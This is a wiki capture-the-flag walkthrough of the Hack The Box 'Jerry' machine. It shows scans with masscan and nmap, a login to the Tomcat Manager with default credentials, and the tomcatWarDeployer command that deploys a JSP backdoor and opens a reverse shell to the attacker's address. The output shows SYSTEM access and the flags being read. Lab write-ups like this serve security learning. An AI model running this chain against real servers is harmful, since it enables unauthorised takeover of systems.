Jerry

From Luniwiki
Jump to: navigation, search

Back

Jerry01.png

Ports scan

root@kali:~/HTB/Machines/Jerry# masscan -e tun0 -p1-65535,U:1-65535 10.10.10.95 --rate=1000
Starting masscan 1.0.5 at 2019-12-03 18:08:03 GMT
 -- forced options: -sS -Pn -n --randomize-hosts -v --send-eth
Initiating SYN Stealth Scan
Scanning 1 hosts [131070 ports/host]
Discovered open port 8080/tcp on 10.10.10.95

Nmap

root@kali:~/HTB/Machines/Jerry# nmap -sC -sV 10.10.10.95
Starting Nmap 7.80 ( https://nmap.org ) at 2019-12-03 13:09 EST
Nmap scan report for jerry.htb (10.10.10.95)
Host is up (0.043s latency).
Not shown: 999 filtered ports
PORT     STATE SERVICE VERSION
8080/tcp open  http    Apache Tomcat/Coyote JSP engine 1.1
|_http-favicon: Apache Tomcat
|_http-server-header: Apache-Coyote/1.1
|_http-title: Apache Tomcat/7.0.88

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 13.85 seconds

Web browsing

It seems to be a tomcat installation.

Jerry02.png

If we do not provide password, Tomcat bounces a 403 error, but explains how to setup users and password, providing the default password.

Jerry03.png

The default password works. We access the Manager.

Jerry04.png

tomcatWarDepoyer

We can build our own war file to create a reverse shell, but Mariusz B. has already done it for us.

Install utility

root@kali:~/HTB/Utils# git clone https://github.com/mgeeky/tomcatWarDeployer.git
Cloning into 'tomcatWarDeployer'...
remote: Enumerating objects: 269, done.
remote: Total 269 (delta 0), reused 0 (delta 0), pack-reused 269
Receiving objects: 100% (269/269), 193.51 KiB | 1.50 MiB/s, done.
Resolving deltas: 100% (148/148), done.

Create the reverse shell

root@kali:~/HTB/Machines/Jerry# python ../../Utils/tomcatWarDeployer/tomcatWarDeployer.py 10.10.10.95:8080 -U tomcat -P s3cret -H 10.10.14.34 -p 4444 -v -u /manager/html

tomcatWarDeployer (v. 0.5.2) Apache Tomcat auto WAR deployment & launching tool Mariusz B. / MGeeky '16-18
Penetration Testing utility aiming at presenting danger of leaving Tomcat misconfigured.
INFO: Reverse shell will connect to: 10.10.14.34:4444. DEBUG: Trying Creds: ["tomcat:s3cret"]: Browsing to "http://10.10.10.95:8080/manager/html"... DEBUG: Trying to fetch: "http://10.10.10.95:8080/manager/html/" DEBUG: Probably found something: Apache Tomcat/7.0.88 INFO: Apache Tomcat/7.0.88 Manager Application reached & validated. INFO: At: "http://10.10.10.95:8080/manager/html/" DEBUG: Generating JSP WAR backdoor code... DEBUG: Preparing additional code for Reverse TCP shell DEBUG: Generating temporary structure for jsp_app WAR at: "/tmp/tmp_sTDOH" DEBUG: Working with Java at version: 11.0.5 DEBUG: Generating web.xml with servlet-name: "JSP Application" DEBUG: Generating WAR file at: "/tmp/jsp_app.war" DEBUG: added manifest adding: files/(in = 0) (out= 0)(stored 0%) adding: files/WEB-INF/(in = 0) (out= 0)(stored 0%) adding: files/WEB-INF/web.xml(in = 505) (out= 254)(deflated 49%) adding: files/META-INF/(in = 0) (out= 0)(stored 0%) adding: files/META-INF/MANIFEST.MF(in = 66) (out= 65)(deflated 1%) adding: index.jsp(in = 4494) (out= 1681)(deflated 62%) DEBUG: Tree command not available. Skipping. DEBUG: WAR file structure: DEBUG: DEBUG: Checking if app jsp_app is deployed at: http://10.10.10.95:8080/manager/html/ DEBUG: App not deployed. INFO: It looks that the application with specified name "jsp_app" has not been deployed yet. DEBUG: Deploying application: jsp_app from file: "/tmp/jsp_app.war" DEBUG: Removing temporary WAR directory: "/tmp/tmp_sTDOH" INFO: WAR DEPLOYED! Invoking it... DEBUG: Spawned shell handling thread. Awaiting for the event... DEBUG: Awaiting for reverse-shell handler to set-up DEBUG: Establishing listener for incoming reverse TCP shell at 10.10.14.34:4444 DEBUG: Socket is binded to local port now, awaiting for clients... DEBUG: Invoking application at url: "http://10.10.10.95:8080/jsp_app/" DEBUG: Adding 'X-Pass: ijla5qmceoeM' header for shell functionality authentication. DEBUG: Incoming client: 10.10.10.95:49193 DEBUG: Application invoked correctly. INFO: ------------------------------------------------------------ INFO: JSP Backdoor up & running on http://10.10.10.95:8080/jsp_app/ INFO: Happy pwning. Here take that password for web shell: 'ijla5qmceoeM' INFO: ------------------------------------------------------------
INFO: Connected with: nt authority\system@JERRY
C:\apache-tomcat-7.0.88> whoami nt authority\system

User and root flag

C:\apache-tomcat-7.0.88> cd c:\Users\Administrator\Desktop\

c:\Users\Administrator\Desktop>
C:\apache-tomcat-7.0.88> dir Volume in drive C has no label. Volume Serial Number is FC2B-E489
Directory of c:\Users\Administrator\Desktop
06/19/2018 06:09 AM <DIR> . 06/19/2018 06:09 AM <DIR> .. 06/19/2018 06:09 AM <DIR> flags 0 File(s) 0 bytes 3 Dir(s) 27,600,785,408 bytes free
c:\Users\Administrator\Desktop>
C:\apache-tomcat-7.0.88> cd flags
c:\Users\Administrator\Desktop\flags>
C:\apache-tomcat-7.0.88> dir Volume in drive C has no label. Volume Serial Number is FC2B-E489
Directory of c:\Users\Administrator\Desktop\flags
06/19/2018 06:09 AM <DIR> . 06/19/2018 06:09 AM <DIR> .. 06/19/2018 06:11 AM 88 2 for the price of 1.txt 1 File(s) 88 bytes 2 Dir(s) 27,600,785,408 bytes free
C:\apache-tomcat-7.0.88> type "2 for the price of 1.txt" user.txt <USER_FALG>
root.txt <ROOT_FLAG> c:\Users\Administrator\Desktop\flags>
C:\apache-tomcat-7.0.88> exit

Remove the war

root@kali:~/HTB/Machines/Jerry# python ../../Utils/tomcatWarDeployer/tomcatWarDeployer.py 10.10.10.95:8080 -U tomcat -P s3cret -H 10.10.14.34 -p 4444 -R -v -u /manager/html

tomcatWarDeployer (v. 0.5.2) Apache Tomcat auto WAR deployment & launching tool Mariusz B. / MGeeky '16-18
Penetration Testing utility aiming at presenting danger of leaving Tomcat misconfigured.
INFO: Reverse shell will connect to: 10.10.14.34:4444. WARNING: Removing previously deployed package, any further actions will not be undertaken. DEBUG: Trying Creds: ["tomcat:s3cret"]: Browsing to "http://10.10.10.95:8080/manager/html"... DEBUG: Trying to fetch: "http://10.10.10.95:8080/manager/html/" DEBUG: Probably found something: Apache Tomcat/7.0.88 INFO: Apache Tomcat/7.0.88 Manager Application reached & validated. INFO: At: "http://10.10.10.95:8080/manager/html/" DEBUG: Checking if app jsp_app is deployed at: http://10.10.10.95:8080/manager/html/ INFO: Removing previously deployed WAR application with name: 'jsp_app' INFO: Succeeded. Hasta la vista!

References

Daniel Simao 18:22, 3 December 2019 (EST)